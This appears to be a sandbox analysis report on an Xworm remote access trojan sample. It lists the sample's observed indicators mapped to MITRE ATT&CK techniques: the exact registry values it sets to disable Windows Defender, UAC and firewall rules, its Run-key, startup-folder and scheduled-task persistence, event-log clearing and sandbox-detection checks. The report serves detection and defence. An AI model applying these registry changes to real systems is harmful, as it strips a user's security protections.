xworm | b5ce0c67ad36e1ec6375ad00f7cc90f337ee6ef116594e01a477346496ece01c

Windows Service

Disable or Modify Tools

T1562.001

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	reg.exe

Modifies firewall policy service 3 TTPs 3 IoCs

evasion

Modify Registry

Windows Service

Disable or Modify System Firewall

T1562.004

description	ioc	Process
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules	reg.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules	reg.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\	reg.exe

UAC bypass 3 TTPs 5 IoCs

evasion trojan

Bypass User Account Control

T1548.002

Disable or Modify Tools

T1562.001

Modify Registry

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	reg.exe

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Xworm family
xworm

Blocklisted process makes network request 2 IoCs

flow	pid	Process
9	4780	powershell.exe
12	4780	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
524	powershell.exe
3364	powershell.exe
4744	powershell.exe
2900	powershell.exe
4980	powershell.exe
4668	powershell.exe
820	powershell.exe

Event Triggered Execution: Image File Execution Options Injection 1 TTPs 6 IoCs

persistence

Image File Execution Options Injection

T1546.012

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\csrss.exe\PerfOptions\IoPriority = "3"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\csrss.exe\PerfOptions	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\csrss.exe	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\csrss.exe\PerfOptions\CpuPriorityClass = "3"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\csrss.exe\PerfOptions	reg.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3982764349-3037452555-3708423086-1000\Control Panel\International\Geo\Nation	WScript.exe

Drops startup file 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SubDir.lnk	powershell.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SubDir.lnk	powershell.exe

Executes dropped EXE 2 IoCs

pid	Process
2364	dsfsdfs.exe
1564	SubDir.exe

Indicator Removal: Clear Windows Event Logs 1 TTPs 1 IoCs

Clear Windows Event Logs to hide the activity of an intrusion.

defense_evasion

Clear Windows Event Logs

T1070.001

description	ioc	Process
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-BackgroundTaskInfrastructure%4Operational.evtx	svchost.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3982764349-3037452555-3708423086-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SubDir = "C:\\Users\\Admin\\AppData\\Roaming\\SubDir.exe"	powershell.exe

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
8	ip-api.com

Drops file in System32 directory 4 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\Tasks\SubDir	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749	svchost.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Checks SCSI registry key(s) 3 TTPs 14 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Set value (data)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr\PartitionTableCache = 0000000004000000963b871ee439664f0000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000c01200000000ffffffff000000002701010000080000963b871e0000000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000d01200000000000020ed3a000000ffffffff000000000700010000680900963b871e000000000000d012000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000f0ff3a0000000000000005000000ffffffff000000000700010000f87f1d963b871e000000000000f0ff3a00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff000000000000000000000000963b871e00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	vssvc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0002	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0002	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002	svchost.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters	vssvc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001	svchost.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr	vssvc.exe
Set value (data)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr\SnapshotDataCache = 534e41505041525401000000700000008ec7416a0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	vssvc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0002	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters	vssvc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0002	svchost.exe

Disables Windows logging functionality 2 TTPs
Changes registry settings to disable Windows Event logging.

Disable or Modify Tools
T1562.001

Modify Registry
T1112

Modifies data under HKEY_USERS 50 IoCs

description	ioc	Process
Set value (str)	\REGISTRY\USER\.DEFAULT\Control Panel\Mouse\MouseHoverTime = "0"	reg.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Control Panel\Mouse	reg.exe
Key created	\REGISTRY\USER\.DEFAULT\Control Panel\Mouse	reg.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\CA\CRLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CTLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\Certificates	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CTLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CTLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\trust\CTLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\Certificates	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CRLs	svchost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Control Panel\Mouse\MouseSpeed = "0"	reg.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\CA\CTLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\Certificates	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CRLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\Certificates	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CTLs	svchost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Control Panel\Mouse\MouseThreshold2 = "0"	reg.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Root\CTLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CRLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\trust\Certificates	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Root\CRLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Control Panel\Mouse	reg.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Control Panel\Mouse\MouseThreshold1 = "0"	reg.exe
Key created	\REGISTRY\USER\.DEFAULT\Control Panel\Mouse	reg.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CRLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\trust\CRLs	svchost.exe

Modifies registry class 39 IoCs

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{F02C1A0D-BE21-4350-88B0-7367FC96EF3C}	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-3982764349-3037452555-3708423086-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\HAM\AUI\Global.IrisService\V1\LU	svchost.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3982764349-3037452555-3708423086-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\HAM\AUI\Global.IrisService\V1\LU\PTT = "133817111181189621"	svchost.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\System.IsPinnedToNameSpaceTree = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-3982764349-3037452555-3708423086-1000_Classes\Local Settings	powershell.exe
Key created	\REGISTRY\USER\S-1-5-21-3982764349-3037452555-3708423086-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\HAM\AUI\Global.IrisService	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-3982764349-3037452555-3708423086-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{F02C1A0D-BE21-4350-88B0-7367FC96EF3C}\ShellFolder	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-3982764349-3037452555-3708423086-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\MicrosoftWindows.Client.CBS_cw5n1h2txyewy	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-3982764349-3037452555-3708423086-1000_Classes\Local Settings\Software\Microsoft\Windows	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-3982764349-3037452555-3708423086-1000_Classes\Local Settings\Software	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-3982764349-3037452555-3708423086-1000_Classes\Local Settings\Software\Microsoft	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3982764349-3037452555-3708423086-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\FolderType = "NotSpecified"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\System.IsPinnedToNameSpaceTree = "0"	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-21-3982764349-3037452555-3708423086-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-3982764349-3037452555-3708423086-1000_Classes\Local Settings	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-21-3982764349-3037452555-3708423086-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-21-3982764349-3037452555-3708423086-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-3982764349-3037452555-3708423086-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\System.IsPinnedToNameSpaceTree = "0"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3982764349-3037452555-3708423086-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\HAM\AUI\Global.IrisService\V1\LU\PCT = "133817110870457252"	svchost.exe
Key deleted	\REGISTRY\USER\S-1-5-21-3982764349-3037452555-3708423086-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{F02C1A0D-BE21-4350-88B0-7367FC96EF3C}	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-3982764349-3037452555-3708423086-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{F02C1A0D-BE21-4350-88B0-7367FC96EF3C}\ShellFolder	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\System.IsPinnedToNameSpaceTree = "0"	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-21-3982764349-3037452555-3708423086-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-21-3982764349-3037452555-3708423086-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-21-3982764349-3037452555-3708423086-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\Microsoft.Windows.ControlPanel	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-3982764349-3037452555-3708423086-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-3982764349-3037452555-3708423086-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\HAM\AUI	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-3982764349-3037452555-3708423086-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\HAM\AUI\Global.IrisService\V1	svchost.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

pid	Process
1652	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
4744	powershell.exe
4744	powershell.exe
524	powershell.exe
524	powershell.exe
4780	powershell.exe
4780	powershell.exe
4780	powershell.exe
4780	powershell.exe
4780	powershell.exe
4780	powershell.exe
4780	powershell.exe
4780	powershell.exe
4780	powershell.exe
4780	powershell.exe
4780	powershell.exe
4780	powershell.exe
4780	powershell.exe
4780	powershell.exe
4780	powershell.exe
4780	powershell.exe
4780	powershell.exe
4780	powershell.exe
4780	powershell.exe
2900	powershell.exe
2900	powershell.exe
4780	powershell.exe
4780	powershell.exe
4780	powershell.exe
4780	powershell.exe
4780	powershell.exe
4780	powershell.exe
4980	powershell.exe
4980	powershell.exe
4780	powershell.exe
4780	powershell.exe
4780	powershell.exe
4780	powershell.exe
4780	powershell.exe
4780	powershell.exe
4668	powershell.exe
4668	powershell.exe
4744	powershell.exe
4780	powershell.exe
4780	powershell.exe
4780	powershell.exe
4744	powershell.exe
820	powershell.exe
820	powershell.exe
4780	powershell.exe
4780	powershell.exe
4780	powershell.exe
3364	powershell.exe
3364	powershell.exe
4780	powershell.exe
4780	powershell.exe
4780	powershell.exe
4780	powershell.exe
4780	powershell.exe
4780	powershell.exe
4780	powershell.exe
4780	powershell.exe
4780	powershell.exe
4780	powershell.exe
4780	powershell.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
3528	Explorer.EXE

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	4744	powershell.exe
Token: SeDebugPrivilege	524	powershell.exe
Token: SeIncreaseQuotaPrivilege	524	powershell.exe
Token: SeSecurityPrivilege	524	powershell.exe
Token: SeTakeOwnershipPrivilege	524	powershell.exe
Token: SeLoadDriverPrivilege	524	powershell.exe
Token: SeSystemProfilePrivilege	524	powershell.exe
Token: SeSystemtimePrivilege	524	powershell.exe
Token: SeProfSingleProcessPrivilege	524	powershell.exe
Token: SeIncBasePriorityPrivilege	524	powershell.exe
Token: SeCreatePagefilePrivilege	524	powershell.exe
Token: SeBackupPrivilege	524	powershell.exe
Token: SeRestorePrivilege	524	powershell.exe
Token: SeShutdownPrivilege	524	powershell.exe
Token: SeDebugPrivilege	524	powershell.exe
Token: SeSystemEnvironmentPrivilege	524	powershell.exe
Token: SeRemoteShutdownPrivilege	524	powershell.exe
Token: SeUndockPrivilege	524	powershell.exe
Token: SeManageVolumePrivilege	524	powershell.exe
Token: 33	524	powershell.exe
Token: 34	524	powershell.exe
Token: 35	524	powershell.exe
Token: 36	524	powershell.exe
Token: SeIncreaseQuotaPrivilege	524	powershell.exe
Token: SeSecurityPrivilege	524	powershell.exe
Token: SeTakeOwnershipPrivilege	524	powershell.exe
Token: SeLoadDriverPrivilege	524	powershell.exe
Token: SeSystemProfilePrivilege	524	powershell.exe
Token: SeSystemtimePrivilege	524	powershell.exe
Token: SeProfSingleProcessPrivilege	524	powershell.exe
Token: SeIncBasePriorityPrivilege	524	powershell.exe
Token: SeCreatePagefilePrivilege	524	powershell.exe
Token: SeBackupPrivilege	524	powershell.exe
Token: SeRestorePrivilege	524	powershell.exe
Token: SeShutdownPrivilege	524	powershell.exe
Token: SeDebugPrivilege	524	powershell.exe
Token: SeSystemEnvironmentPrivilege	524	powershell.exe
Token: SeRemoteShutdownPrivilege	524	powershell.exe
Token: SeUndockPrivilege	524	powershell.exe
Token: SeManageVolumePrivilege	524	powershell.exe
Token: 33	524	powershell.exe
Token: 34	524	powershell.exe
Token: 35	524	powershell.exe
Token: 36	524	powershell.exe
Token: SeIncreaseQuotaPrivilege	524	powershell.exe
Token: SeSecurityPrivilege	524	powershell.exe
Token: SeTakeOwnershipPrivilege	524	powershell.exe
Token: SeLoadDriverPrivilege	524	powershell.exe
Token: SeSystemProfilePrivilege	524	powershell.exe
Token: SeSystemtimePrivilege	524	powershell.exe
Token: SeProfSingleProcessPrivilege	524	powershell.exe
Token: SeIncBasePriorityPrivilege	524	powershell.exe
Token: SeCreatePagefilePrivilege	524	powershell.exe
Token: SeBackupPrivilege	524	powershell.exe
Token: SeRestorePrivilege	524	powershell.exe
Token: SeShutdownPrivilege	524	powershell.exe
Token: SeDebugPrivilege	524	powershell.exe
Token: SeSystemEnvironmentPrivilege	524	powershell.exe
Token: SeRemoteShutdownPrivilege	524	powershell.exe
Token: SeUndockPrivilege	524	powershell.exe
Token: SeManageVolumePrivilege	524	powershell.exe
Token: 33	524	powershell.exe
Token: 34	524	powershell.exe
Token: 35	524	powershell.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
3528	Explorer.EXE
3528	Explorer.EXE
3528	Explorer.EXE
3528	Explorer.EXE
3528	Explorer.EXE
3528	Explorer.EXE
3528	Explorer.EXE
3528	Explorer.EXE
3528	Explorer.EXE
3528	Explorer.EXE
3528	Explorer.EXE
3528	Explorer.EXE
3528	Explorer.EXE
3528	Explorer.EXE
3528	Explorer.EXE
3528	Explorer.EXE
3528	Explorer.EXE
3528	Explorer.EXE
3528	Explorer.EXE
3528	Explorer.EXE
3528	Explorer.EXE
3528	Explorer.EXE
3528	Explorer.EXE
3528	Explorer.EXE
3528	Explorer.EXE
3528	Explorer.EXE
3528	Explorer.EXE
3528	Explorer.EXE
3528	Explorer.EXE
3528	Explorer.EXE
3528	Explorer.EXE
3528	Explorer.EXE
3528	Explorer.EXE
3528	Explorer.EXE
3528	Explorer.EXE
3528	Explorer.EXE
3528	Explorer.EXE
3528	Explorer.EXE
3528	Explorer.EXE
3528	Explorer.EXE
3528	Explorer.EXE
3528	Explorer.EXE
3528	Explorer.EXE
3528	Explorer.EXE
3528	Explorer.EXE
3528	Explorer.EXE
3528	Explorer.EXE
3528	Explorer.EXE
3528	Explorer.EXE
3528	Explorer.EXE
3528	Explorer.EXE
3528	Explorer.EXE
3528	Explorer.EXE
3528	Explorer.EXE
3528	Explorer.EXE
3528	Explorer.EXE
3528	Explorer.EXE
3528	Explorer.EXE
3528	Explorer.EXE
3528	Explorer.EXE
3528	Explorer.EXE
3528	Explorer.EXE
3528	Explorer.EXE
3528	Explorer.EXE

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4764 wrote to memory of 2516	4764	cmd.exe	82
PID 4764 wrote to memory of 2516	4764	cmd.exe	82
PID 4764 wrote to memory of 4744	4764	cmd.exe	83
PID 4764 wrote to memory of 4744	4764	cmd.exe	83
PID 4744 wrote to memory of 524	4744	powershell.exe	84
PID 4744 wrote to memory of 524	4744	powershell.exe	84
PID 4744 wrote to memory of 3728	4744	powershell.exe	87
PID 4744 wrote to memory of 3728	4744	powershell.exe	87
